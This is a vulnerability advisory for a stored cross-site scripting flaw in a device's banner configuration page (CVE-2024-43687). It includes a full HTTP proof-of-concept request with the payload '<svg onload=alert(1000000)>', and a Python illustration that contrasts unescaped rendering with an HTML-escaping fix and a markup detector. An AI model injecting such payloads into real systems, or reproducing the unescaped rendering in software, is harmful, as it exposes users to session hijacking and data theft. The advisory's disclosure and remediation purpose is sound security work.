Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CWE-79
Software Version: 2.3.12
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43687
CVSS: 6.1
Severity: Medium
Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
The field "Custom Banner" in the tab "Banner config" has been found vulnerable to stored cross-site scripting (XSS). The injected script is executed by the browser whenever a user visits the banner page. This type of XSS is particularly dangerous because the malicious code is saved by the device and runs for every user who loads the page, until the device is reset.
Step-by-step instructions and PoC
A user authenticated to the web application can insert JavaScript code in the banner configuration.
Affected Endpoints
• URL: http://<device_IP>/bannerconfig
• HTTP Parameter: txtcustom
Below is the evidence with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:
POST /bannerconfig HTTP/1.1
Host: <device_IP>
Cookie: ci_session=2e5d6db87cf9104d4b8bfd4951665c2b96fffc24
Content-Length: 477
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://<device_IP>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryayaMItq0sXj5hiI2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://<device_IP>/bannerconfig
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close
------WebKitFormBoundaryayaMItq0sXj5hiI2
Content-Disposition: form-data; name="user_level"
1
------WebKitFormBoundaryayaMItq0sXj5hiI2
Content-Disposition: form-data; name="bannerradio"
CUSTOMIZED
------WebKitFormBoundaryayaMItq0sXj5hiI2
Content-Disposition: form-data; name="txtcustom"
<svg onload=alert(1000000)>
------WebKitFormBoundaryayaMItq0sXj5hiI2
Content-Disposition: form-data; name="action"
applybanner
------WebKitFormBoundaryayaMItq0sXj5hiI2--
After logging in, go to the panel ‘Admin’ -> ‘Banner Config’. Select ‘Custom Banner’ and insert the following JavaScript payload:
<svg onload=alert(1000000)>
Figure 7: Add javascript payload
Then click ‘Apply’. Finally, the JavaScript code is executed in the banner page at ‘https://<device_IP>’
Figure 8: Stored Cross-site Scripting
Security Impact
By using malicious JavaScript code, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker could transfer private information from the victim's machine to the attacker, or send malicious requests to a web site on behalf of the victim.
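The root cause described above is that the value of the txtcustom parameter is stored and later written into the banner page without output encoding. The following Python snippet is an added illustration, not code from the advisory or from the affected product: it uses a minimal stand-in renderer (the real device firmware is not shown on this page) to contrast the defective behaviour with a hardened version that HTML-encodes the stored value at output time, and adds a simple defender check that flags markup in a stored banner value. The function names and the benign sample text are constructed for this example; the payload string is the one from the advisory.

```python
import html
import re

# Constructed samples: the advisory's payload and a benign banner text.
PAYLOAD = "<svg onload=alert(1000000)>"
BENIGN = "Authorized access only. Activity is monitored & logged."


def render_banner_vulnerable(txtcustom: str) -> str:
    """Stand-in for the defect (hypothetical renderer): the stored banner
    text is concatenated into the HTML page unchanged, so any markup in it
    is parsed and executed by the visitor's browser."""
    return f'<div class="banner">{txtcustom}</div>'


def render_banner_safe(txtcustom: str) -> str:
    """Hardened variant: HTML-encode the stored value at output time.
    '<', '>', '&', '"' and "'" become entities, so the browser shows the
    text literally instead of interpreting it as a tag or attribute."""
    return f'<div class="banner">{html.escape(txtcustom, quote=True)}</div>'


# Anything that starts an HTML tag or declaration ("<svg", "</div", "<!--").
_TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]")


def looks_like_markup(txtcustom: str) -> bool:
    """Defender-side check usable both when 'applybanner' is handled
    (reject the value) and when auditing a device's stored configuration
    (flag a banner that would execute in the vulnerable renderer).
    Output encoding above is the actual fix; this is defence in depth."""
    return _TAG_RE.search(txtcustom) is not None


if __name__ == "__main__":
    for text in (BENIGN, PAYLOAD):
        print("stored value     :", text)
        print("vulnerable render:", render_banner_vulnerable(text))
        print("safe render      :", render_banner_safe(text))
        print("flagged as markup:", looks_like_markup(text))
        print()
```

With the advisory's payload, the safe renderer emits `&lt;svg onload=alert(1000000)&gt;` inside the div, which the browser displays as text; the benign banner renders the same way in both versions apart from the ampersand being encoded as `&amp;`. Encoding at output time is preferable to only filtering input, because stored values written before a fix is deployed, or entered through another path, are still rendered safely.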